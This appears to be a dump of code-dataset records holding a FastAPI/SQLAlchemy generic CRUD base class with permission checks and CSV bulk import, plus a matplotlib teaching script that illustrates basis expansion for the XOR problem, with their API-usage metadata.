"time.time", "line_number": 35, "usage_type": "call"}, {"api_name": "http.server.BaseHTTPRequestHandler", "line_number": 42, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "utils.getMimeTypeFromFile", "line_number": 107, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 133, "usage_type": "call"}, {"api_name": "urllib.parse.parse_qs", "line_number": 144, "usage_type": "call"}, {"api_name": "urllib.parse.parse_qs", 
"line_number": 153, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 153, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 180, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 183, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 186, "usage_type": "call"}, {"api_name": "models.Model.fetch", "line_number": 192, "usage_type": "call"}, {"api_name": "models.Model", "line_number": 192, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 213, "usage_type": "call"}, {"api_name": "os.path", "line_number": 213, "usage_type": "attribute"}, {"api_name": "models.Model.fetch", "line_number": 216, "usage_type": "call"}, {"api_name": "models.Model", "line_number": 216, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 217, "usage_type": "call"}, {"api_name": "time.time", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 231, "usage_type": "call"}, {"api_name": "os.path", "line_number": 231, "usage_type": "attribute"}, {"api_name": "urllib.parse.urlparse", "line_number": 253, "usage_type": "call"}, {"api_name": "models.Model", "line_number": 262, "usage_type": "call"}, {"api_name": "re.match", "line_number": 275, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 283, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 293, "usage_type": "call"}, {"api_name": "os.path", "line_number": 293, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 301, "usage_type": "call"}, {"api_name": "models.Model.fetch", "line_number": 307, "usage_type": "call"}, {"api_name": "models.Model", "line_number": 307, "usage_type": "name"}, {"api_name": "re.match", "line_number": 310, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 319, "usage_type": "call"}, {"api_name": "re.match", "line_number": 321, "usage_type": "call"}, {"api_name": "re.match", "line_number": 327, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 340, "usage_type": "call"}, {"api_name": "re.match", "line_number": 346, "usage_type": "call"}, {"api_name": "socketserver.ThreadingMixIn", "line_number": 358, "usage_type": "name"}, {"api_name": "http.server.HTTPServer", "line_number": 358, "usage_type": "name"}]} +{"seq_id": "22840191329", "text": "from typing import Any, Generic, Type, TypeVar\nfrom fastapi import HTTPException\nfrom fastapi.encoders import jsonable_encoder\nfrom pydantic import BaseModel\nfrom sqlalchemy import select, and_\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.sql.expression import Select\nfrom pathlib import Path\n\nfrom app.db.base import Base\nfrom app.db.filter import apply_filters\nfrom app.db.sort import apply_sort\nfrom app.db.paginate import apply_pagination\nfrom app.db.session import db_session, engine, db_schema\nfrom app.core.permissions import permission_exception, has_permission\nfrom app.core.enums import Permission\nfrom app.models.user import User\n\n# SQLAlchemy model type for the main object. Ex: \"OppStage\"\nModel = TypeVar(\"Model\", bound=Base)\n\n# SQLAlchemy model type for the descriptions object. Ex: \"OppStageDescription\"\nModelDescription = TypeVar(\"ModelDescription\", bound=Base)\n\n# Pydantic model type for Create. Ex: \"OppStageCreate\"\nCreateSchema = TypeVar(\"CreateSchema\", bound=BaseModel)\n\n# Pydantic model type for Update. 
Ex: \"OppStageUpdate\"\nUpdateSchema = TypeVar(\"UpdateSchema\", bound=BaseModel)\n\n# Base CRUD class with default methods for Create, Read, Update, Delete (CRUD) operations\nclass CRUDBase(Generic[Model, CreateSchema, UpdateSchema]):\n def __init__(self, model: Type[Model]) -> None:\n self.model = model\n\n def get(self, db: Session, id: Any, user: User) -> Model | None:\n \"\"\"Returns the record based on the ID\"\"\"\n db_session.set(db)\n\n result = db.execute(select(self.model).where(self.model.id == id)).scalars().one_or_none()\n if result is not None:\n if not has_permission(user=user, resource=result, permission=Permission.read):\n raise permission_exception\n\n return result\n\n def get_all(\n self,\n db: Session,\n filter_spec: list[dict] | dict,\n sort_spec: list[dict] | dict,\n offset: int,\n limit: int,\n user: User,\n query: Select | None = None,\n ):\n \"\"\"Returns all records\"\"\"\n if query is None:\n query = select(self.model)\n\n if filter_spec:\n query = apply_filters(query=query, default_model=self.model, filter_spec=filter_spec) # type: ignore\n\n if sort_spec:\n query = apply_sort(query=query, default_model=self.model, sort_spec=sort_spec) # type: ignore\n\n query, pagination = apply_pagination(db=db, query=query, offset=offset, limit=limit) # type: ignore\n\n if pagination.total == 0:\n raise HTTPException(status_code=404, detail=\"No records were found.\")\n\n return {\n \"items\": db.execute(query).scalars().all(),\n \"total\": pagination.total,\n \"page\": pagination.page,\n \"size\": pagination.size,\n }\n\n def create(self, db: Session, obj_in: CreateSchema, user: User) -> Model:\n \"\"\"Creates the record\"\"\"\n db_session.set(db)\n db_obj = self.model(**obj_in.dict(), created_by_id=user.id)\n\n if not has_permission(user=user, resource=db_obj, permission=Permission.create):\n raise permission_exception\n\n db.add(db_obj)\n db.commit()\n db.refresh(db_obj)\n return db_obj\n\n def update(self, db: Session, db_obj: Model, obj_in: UpdateSchema, user: User) -> Model:\n \"\"\"Updates the record\"\"\"\n db_session.set(db)\n\n if not has_permission(user=user, resource=db_obj, permission=Permission.update):\n raise permission_exception\n\n obj_data = jsonable_encoder(db_obj)\n update_data = obj_in.dict(exclude_unset=True)\n\n for field in update_data:\n if field in obj_data:\n setattr(db_obj, field, update_data[field])\n db_obj.updated_by_id = user.id\n\n db.add(db_obj)\n db.commit()\n db.refresh(db_obj)\n return db_obj\n\n def delete(self, db: Session, db_obj: Model, user: User) -> None:\n \"\"\"Deletes the record\"\"\"\n db_session.set(db)\n\n if not has_permission(user=user, resource=db_obj, permission=Permission.delete):\n raise permission_exception\n\n db.delete(db_obj)\n db.commit()\n\n def bulk_create(self, user: User, filepath: Path) -> None:\n \"\"\"Creates records in bulk using psycopg's COPY FROM functionality\"\"\"\n schema = db_schema.get()\n\n with filepath.open(\"r\") as f:\n conn = engine.raw_connection()\n cursor = conn.cursor()\n cmd = None\n\n if self.model.__name__ == \"Account\":\n cmd = f\"\"\"COPY {schema}.account (external_id, source_url, name, annual_revenue, \n annual_revenue_curr_code, number_of_employees, street, address_line_2, \n address_line_3, city, state, country_code, postal_code, fax, email, \n phone, website, industry_id, is_active, created_by_id) \n FROM STDIN WITH (FORMAT CSV, HEADER TRUE)\"\"\"\n\n if self.model.__name__ == \"Opportunity\":\n cmd = f\"\"\"COPY {schema}.opportunity (external_id, name, account_id, \n 
expected_amount, expected_amount_curr_code, start_date, close_date, \n owner_id, probability, stage_id, status, created_by_id) \n FROM STDIN WITH (FORMAT CSV, HEADER TRUE)\"\"\"\n\n cursor.copy_expert(cmd, f) # type: ignore\n conn.commit()\n\n\n# Extends the Create and Update methods in the Base CRUD class for objects with associated descriptions object\nclass CRUDBaseDesc(\n CRUDBase[Model, CreateSchema, UpdateSchema],\n Generic[Model, ModelDescription, CreateSchema, UpdateSchema],\n):\n def __init__(self, model: Type[Model], model_description: Type[ModelDescription]) -> None:\n self.model = model\n self.model_description = model_description\n\n def create(self, db: Session, obj_in: CreateSchema, user: User) -> Model:\n \"\"\"Creates the record and the associated descriptions\"\"\"\n db_session.set(db)\n db_obj = self.model(**obj_in.dict(exclude={\"descriptions\"}), created_by_id=user.id)\n descriptions = obj_in.dict()[\"descriptions\"]\n\n if not has_permission(user=user, resource=db_obj, permission=Permission.create):\n raise permission_exception\n\n for description in descriptions:\n db_obj_description = self.model_description(**description)\n db_obj.descriptions.append(db_obj_description)\n\n db.add(db_obj)\n db.commit()\n db.refresh(db_obj)\n return db_obj\n\n def update(self, db: Session, db_obj: Model, obj_in: UpdateSchema, user: User) -> Model:\n \"\"\"Updates the record and the associated descriptions\"\"\"\n db_session.set(db)\n\n if not has_permission(user=user, resource=db_obj, permission=Permission.update):\n raise permission_exception\n\n obj_data = jsonable_encoder(db_obj)\n update_data = obj_in.dict(exclude_unset=True)\n\n for field in update_data:\n if field in obj_data:\n setattr(db_obj, field, update_data[field])\n db_obj.updated_by_id = user.id\n\n if \"descriptions\" in update_data:\n # There are descriptions to be updated\n for item in update_data[\"descriptions\"]:\n db_obj_desc = (\n db.execute(\n select(self.model_description).where(\n and_(\n self.model_description.id == db_obj.id,\n self.model_description.language_code == item[\"language_code\"],\n )\n )\n )\n .scalars()\n .first()\n )\n\n if db_obj_desc:\n # A description for that language already exists and must be updated\n db_obj_desc.description = item[\"description\"]\n db.add(db_obj_desc)\n else:\n # The description in this language does not exist and must be appended\n db_obj_desc = self.model_description(**item)\n db_obj.descriptions.append(db_obj_desc)\n\n db.add(db_obj)\n db.commit()\n db.refresh(db_obj)\n return db_obj\n", "repo_name": "tsharish/presalesly", "sub_path": "backend/app/crud/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 8290, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.TypeVar", "line_number": 20, "usage_type": "call"}, {"api_name": "app.db.base.Base", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.TypeVar", "line_number": 23, "usage_type": "call"}, {"api_name": "app.db.base.Base", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.TypeVar", "line_number": 26, "usage_type": "call"}, {"api_name": "pydantic.BaseModel", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.TypeVar", "line_number": 29, "usage_type": "call"}, {"api_name": "pydantic.BaseModel", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Generic", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 33, "usage_type": 
"name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 36, "usage_type": "name"}, {"api_name": "app.models.user.User", "line_number": 36, "usage_type": "name"}, {"api_name": "app.db.session.db_session.set", "line_number": 38, "usage_type": "call"}, {"api_name": "app.db.session.db_session", "line_number": 38, "usage_type": "name"}, {"api_name": "sqlalchemy.select", "line_number": 40, "usage_type": "call"}, {"api_name": "app.core.permissions.has_permission", "line_number": 42, "usage_type": "call"}, {"api_name": "app.core.enums.Permission.read", "line_number": 42, "usage_type": "attribute"}, {"api_name": "app.core.enums.Permission", "line_number": 42, "usage_type": "name"}, {"api_name": "app.core.permissions.permission_exception", "line_number": 43, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 49, "usage_type": "name"}, {"api_name": "app.models.user.User", "line_number": 54, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.expression.Select", "line_number": 55, "usage_type": "name"}, {"api_name": "sqlalchemy.select", "line_number": 59, "usage_type": "call"}, {"api_name": "app.db.filter.apply_filters", "line_number": 62, "usage_type": "call"}, {"api_name": "app.db.sort.apply_sort", "line_number": 65, "usage_type": "call"}, {"api_name": "app.db.paginate.apply_pagination", "line_number": 67, "usage_type": "call"}, {"api_name": "fastapi.HTTPException", "line_number": 70, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 79, "usage_type": "name"}, {"api_name": "app.models.user.User", "line_number": 79, "usage_type": "name"}, {"api_name": "app.db.session.db_session.set", "line_number": 81, "usage_type": "call"}, {"api_name": "app.db.session.db_session", "line_number": 81, "usage_type": "name"}, {"api_name": "app.core.permissions.has_permission", "line_number": 84, "usage_type": "call"}, {"api_name": "app.core.enums.Permission.create", "line_number": 84, "usage_type": "attribute"}, {"api_name": "app.core.enums.Permission", "line_number": 84, "usage_type": "name"}, {"api_name": "app.core.permissions.permission_exception", "line_number": 85, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 92, "usage_type": "name"}, {"api_name": "app.models.user.User", "line_number": 92, "usage_type": "name"}, {"api_name": "app.db.session.db_session.set", "line_number": 94, "usage_type": "call"}, {"api_name": "app.db.session.db_session", "line_number": 94, "usage_type": "name"}, {"api_name": "app.core.permissions.has_permission", "line_number": 96, "usage_type": "call"}, {"api_name": "app.core.enums.Permission.update", "line_number": 96, "usage_type": "attribute"}, {"api_name": "app.core.enums.Permission", "line_number": 96, "usage_type": "name"}, {"api_name": "app.core.permissions.permission_exception", "line_number": 97, "usage_type": "name"}, {"api_name": "fastapi.encoders.jsonable_encoder", "line_number": 99, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 112, "usage_type": "name"}, {"api_name": "app.models.user.User", "line_number": 112, "usage_type": "name"}, {"api_name": "app.db.session.db_session.set", "line_number": 114, "usage_type": "call"}, {"api_name": "app.db.session.db_session", "line_number": 114, "usage_type": "name"}, {"api_name": "app.core.permissions.has_permission", "line_number": 116, "usage_type": "call"}, {"api_name": "app.core.enums.Permission.delete", "line_number": 116, "usage_type": "attribute"}, 
{"api_name": "app.core.enums.Permission", "line_number": 116, "usage_type": "name"}, {"api_name": "app.core.permissions.permission_exception", "line_number": 117, "usage_type": "name"}, {"api_name": "app.models.user.User", "line_number": 122, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 122, "usage_type": "name"}, {"api_name": "app.db.session.db_schema.get", "line_number": 124, "usage_type": "call"}, {"api_name": "app.db.session.db_schema", "line_number": 124, "usage_type": "name"}, {"api_name": "app.db.session.engine.raw_connection", "line_number": 127, "usage_type": "call"}, {"api_name": "app.db.session.engine", "line_number": 127, "usage_type": "name"}, {"api_name": "typing.Generic", "line_number": 151, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 153, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 157, "usage_type": "name"}, {"api_name": "app.models.user.User", "line_number": 157, "usage_type": "name"}, {"api_name": "app.db.session.db_session.set", "line_number": 159, "usage_type": "call"}, {"api_name": "app.db.session.db_session", "line_number": 159, "usage_type": "name"}, {"api_name": "app.core.permissions.has_permission", "line_number": 163, "usage_type": "call"}, {"api_name": "app.core.enums.Permission.create", "line_number": 163, "usage_type": "attribute"}, {"api_name": "app.core.enums.Permission", "line_number": 163, "usage_type": "name"}, {"api_name": "app.core.permissions.permission_exception", "line_number": 164, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 175, "usage_type": "name"}, {"api_name": "app.models.user.User", "line_number": 175, "usage_type": "name"}, {"api_name": "app.db.session.db_session.set", "line_number": 177, "usage_type": "call"}, {"api_name": "app.db.session.db_session", "line_number": 177, "usage_type": "name"}, {"api_name": "app.core.permissions.has_permission", "line_number": 179, "usage_type": "call"}, {"api_name": "app.core.enums.Permission.update", "line_number": 179, "usage_type": "attribute"}, {"api_name": "app.core.enums.Permission", "line_number": 179, "usage_type": "name"}, {"api_name": "app.core.permissions.permission_exception", "line_number": 180, "usage_type": "name"}, {"api_name": "fastapi.encoders.jsonable_encoder", "line_number": 182, "usage_type": "call"}, {"api_name": "sqlalchemy.select", "line_number": 195, "usage_type": "call"}, {"api_name": "sqlalchemy.and_", "line_number": 196, "usage_type": "call"}]} +{"seq_id": "40146561882", "text": "\"\"\" DSFM Illustration: Basis expansion\n -------------------------------------------------------------------------------------------------\n \n Creator: Data Science for Managers - EPFL Program - https://www.dsfm.ch\n Source: https://github.com/dsfm-org/code-bank.git\n License: MIT License (https://opensource.org/licenses/MIT) - see LICENSE in Code Bank repository. 
\n \n    OVERVIEW:\n \n    The following module executes the same illustration as the basis-expansion notebook,\n    but allows for interactive rotation of the graphs.\n\n\"\"\"\n\n# Import all packages\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport matplotlib\nfrom mpl_toolkits.mplot3d import axes3d\n\n# Special code to ignore unimportant warnings\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# In[2]:\n\n\n# define all constants\nSTD = 0.30\nN = 100\nFIGSIZE = (10, 10)\nFONTSIZE = 16\nPLOT_X1_LABEL = '\\nNo A                              Yes A'\nPLOT_X2_LABEL = '\\nNo B                              Yes B'\nLOCATION = 1\nPLOT_MIN = -2.0\nPLOT_MAX = 2.0\nPLOT_ALPHA = 0.3\nPLOT_CMAP = cm.winter\nPLOT_LINES = 0\nPLOT_HIDE_GRID = False\n\n\n# ## **Part 1**: Basis function expansion and SVM to solve XOR problem\n# \n# This demo shows how a Support Vector Machine (SVM) can use a non-linear basis function expansion to warp the feature space in order to get it into a better shape for cutting it with a hyper-plane.\n# \n# This demo does NOT show how an SVM actually uses its optimization procedure to find the maximal cutting hyperplane (because the data is already evenly and symmetrically separated around the origin, we can simply put the plane at the origin).\n# \n# Note: 3D-rendering only works in Python scripts.\n\n# In[3]:\n\n\n# Generate data -------------------------------------------------------------------------------\nx1_Yes_A = np.random.normal(loc= LOCATION, scale=STD, size=N)\nx2_Yes_A = np.random.normal(loc= -1 * LOCATION, scale=STD, size=N)\nx1_Yes_B = np.random.normal(loc= -1 * LOCATION, scale=STD, size=N)\nx2_Yes_B = np.random.normal(loc= LOCATION, scale=STD, size=N)\nx1_No_A = np.random.normal(loc= -1 * LOCATION, scale=STD, size=N)\nx2_No_A = np.random.normal(loc= -1 * LOCATION, scale=STD, size=N)\nx1_No_B = np.random.normal(loc= -1 * LOCATION, scale=STD, size=N)\nx2_No_B = np.random.normal(loc= -1 * LOCATION, scale=STD, size=N)\n\n\n# Plot the data in 2-D ------------------------------------------------------------------------\nfig = plt.figure(1, figsize=FIGSIZE)\nax = fig.add_subplot(111)\n\nax.set_title('Fuzzy XOR Data in 2 Dimensions\\n', fontsize = FONTSIZE)\nax.tick_params(axis='both', which='major', labelsize=FONTSIZE)\nax.set_xlabel(PLOT_X1_LABEL, fontsize = FONTSIZE)\nax.set_ylabel(PLOT_X2_LABEL, fontsize = FONTSIZE)\nplt.hlines(0, xmin = min(x1_No_A), xmax = max(x1_Yes_A), colors='black', linewidth=1)\nplt.vlines(0, ymin = min(x2_No_B), ymax = max(x2_Yes_B), colors='black', linewidth=1)\nplt.plot(x1_No_A, x2_No_A, c='red', marker='x', linestyle='None', markersize=10)\nplt.plot(x1_Yes_A, x2_Yes_B, c='red', marker='x', linestyle='None', markersize=10)\nplt.plot(x1_Yes_A, x2_Yes_A, c='green', marker='o', linestyle='None', markersize=10)\nplt.plot(x1_Yes_B, x2_Yes_B, c='green', marker='o', linestyle='None', markersize=10)\nplt.show()\n\n\n# In[4]:\n\n\n# Plot a hyperbolic surface to show a workable transformation ---------------------------------\n\nx = np.arange(PLOT_MIN, PLOT_MAX, 0.05)\ny = np.arange(PLOT_MIN, PLOT_MAX, 0.05)\nx, y = np.meshgrid(x, y)\nsurface_hyperbolic = -(x * y)\nfig = plt.figure(2, figsize=FIGSIZE)\nax = fig.add_subplot(111, projection='3d')\nax.tick_params(axis='both', which='major', labelsize=FONTSIZE)\nax.set_title('Hyperbolic Transformation\\n', fontsize=FONTSIZE)\nax.plot_surface(x, y, surface_hyperbolic, cmap=PLOT_CMAP, alpha=PLOT_ALPHA, linewidth=PLOT_LINES, antialiased=PLOT_HIDE_GRID)\nax.contour(x, y, surface_hyperbolic, cmap=PLOT_CMAP, 
)\nplt.show()\n\n\n# In[5]:\n\n\n# Plot other surfaces (that do NOT work but are interesting) ------------------------------------\n\n# /////// Quadratic surface\nsurface_quadratic = x ** 2 * y ** 2\nfig = plt.figure(3, figsize=FIGSIZE)\nax = fig.add_subplot(111, projection='3d')\nax.tick_params(axis='both', which='major', labelsize=FONTSIZE)\nax.set_title('Quadratic Transformation\\n', fontsize=FONTSIZE)\nax.plot_surface(x, y, surface_quadratic, cmap=PLOT_CMAP, alpha=PLOT_ALPHA, linewidth=PLOT_LINES, antialiased=PLOT_HIDE_GRID)\nax.contour(x, y, surface_quadratic, cmap=PLOT_CMAP)\nax.axis([PLOT_MIN, PLOT_MAX, PLOT_MIN, PLOT_MAX])\nax.set_zlim([0.0, 4.0 * LOCATION])\nplt.show()\n\n\n# In[6]:\n\n\n# /////// Mexican-hat surface\nsurface_mexican = np.cos((x ** 2 + y ** 2) ** .5) ** 2\nfig = plt.figure(4, figsize=FIGSIZE)\nax = fig.add_subplot(111, projection='3d')\nax.tick_params(axis='both', which='major', labelsize=FONTSIZE)\nax.set_title('Mexican-Hat Transformation\\n', fontsize=FONTSIZE)\nax.plot_surface(x, y, surface_mexican, cmap=PLOT_CMAP, alpha=PLOT_ALPHA, linewidth=PLOT_LINES, antialiased=PLOT_HIDE_GRID)\nax.contour(x, y, surface_mexican, cmap=PLOT_CMAP)\nax.axis([PLOT_MIN, PLOT_MAX, PLOT_MIN, PLOT_MAX])\nax.set_zlim([0.0, 1.0 * LOCATION])\nplt.show()\n\n\n# In[7]:\n\n\n# /////// Egg-carton surface\nsurface_eggs = np.cos(2 * x) * np.sin(3 * y)\nfig = plt.figure(5, figsize=FIGSIZE)\nax = fig.add_subplot(111, projection='3d')\nax.tick_params(axis='both', which='major', labelsize=FONTSIZE)\nax.set_title('Peak Transformation\\n', fontsize=FONTSIZE)\nax.plot_surface(x, y, surface_eggs, cmap=PLOT_CMAP, alpha=PLOT_ALPHA, linewidth=PLOT_LINES, antialiased=PLOT_HIDE_GRID)\nax.contour(x, y, surface_eggs, cmap=PLOT_CMAP)\nax.axis([PLOT_MIN, PLOT_MAX, PLOT_MIN, PLOT_MAX])\nax.set_zlim([-LOCATION, LOCATION])\nplt.show()\n\n\n# In[8]:\n\n\n# Project data onto hyperbolic surface -------------------------------------------------------\ny_success_by_a = -(x1_Yes_A * x2_No_B)\ny_success_by_b = -(x1_No_A * x2_Yes_B)\ny_failure_by_inaction = -(x1_No_A * x2_No_A)\ny_failure_by_conflict = -(x1_Yes_A * x2_Yes_B)\n\n\n# Plot projected data in 3-D -----------------------------------------------------------------\nfig = plt.figure(6, figsize=FIGSIZE)\nax = fig.add_subplot(111, projection='3d')\nax.tick_params(axis='both', which='major', labelsize=FONTSIZE)\nax.set_xlabel(PLOT_X1_LABEL, fontsize = FONTSIZE)\nax.set_ylabel(PLOT_X2_LABEL, fontsize = FONTSIZE)\nax.axis([PLOT_MIN, PLOT_MAX, PLOT_MIN, PLOT_MAX])\nax.set_zlim([PLOT_MIN, PLOT_MAX])\nax.plot_surface(x, y, surface_hyperbolic, cmap=PLOT_CMAP, alpha=PLOT_ALPHA, linewidth=PLOT_LINES, antialiased=PLOT_HIDE_GRID)\nax.contour(x, y, surface_hyperbolic, cmap=PLOT_CMAP, )\nax.scatter(x1_No_A, x2_No_B, y_failure_by_inaction, c='red', marker='x', linestyle='None')\nax.scatter(x1_Yes_A, x2_Yes_B, y_failure_by_conflict, c='red', marker='x', linestyle='None')\nax.scatter(x1_Yes_A, x2_No_B, y_success_by_a, c='green', marker='o', linestyle='None')\nax.scatter(x1_No_A, x2_Yes_B, y_success_by_b, c='green', marker='o', linestyle='None')\nplt.show()\n\n\n# In[9]:\n\n\n# Plot 3-D solution (data + a splitting plane) ------------------------------------------------\ncutting_plane = 0.0 * x\nfig = plt.figure(7, figsize=FIGSIZE)\nax = fig.add_subplot(111, projection='3d')\nax.tick_params(axis='both', which='major', labelsize=FONTSIZE)\nax.set_xlabel(PLOT_X1_LABEL, fontsize = FONTSIZE)\nax.set_ylabel(PLOT_X2_LABEL, fontsize = FONTSIZE)\nax.axis([PLOT_MIN, PLOT_MAX, PLOT_MIN, 
PLOT_MAX])\nax.set_zlim([PLOT_MIN, PLOT_MAX])\nax.plot_surface(x, y, surface_hyperbolic, cmap=PLOT_CMAP, alpha=PLOT_ALPHA, linewidth=PLOT_LINES, antialiased=PLOT_HIDE_GRID)\nax.contour(x, y, surface_hyperbolic, cmap=PLOT_CMAP, )\nax.scatter(x1_No_A, x2_No_A, -(x1_No_A * x2_No_A), c='red', marker='x', linestyle='None')\nax.scatter(x1_Yes_A, x2_Yes_B, -(x1_Yes_A * x2_Yes_B), c='red', marker='x', linestyle='None')\nax.scatter(x1_Yes_A, x2_No_B, -(x1_Yes_A * x2_No_B), c='green', marker='o', linestyle='None')\nax.scatter(x1_No_A, x2_Yes_B, -(x1_No_A * x2_Yes_B), c='green', marker='o', linestyle='None')\nax.plot_surface(x, y, cutting_plane, alpha=PLOT_ALPHA, linewidth=PLOT_LINES, antialiased=PLOT_HIDE_GRID)\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "jbesomi/code-bank", "sub_path": "illustrations/basis-expansion/basis-expansion.py", "file_name": "basis-expansion.py", "file_ext": "py", "file_size_in_byte": 8238, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.cm.winter", "line_number": 42, "usage_type": "attribute"}, {"api_name": "matplotlib.cm", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.random.normal", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 66, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.vlines", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 82, "usage_type": "call"}, 
{"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "numpy.cos", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "numpy.cos", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}]} +{"seq_id": "7278573700", "text": "from dataclasses import dataclass\nfrom . 
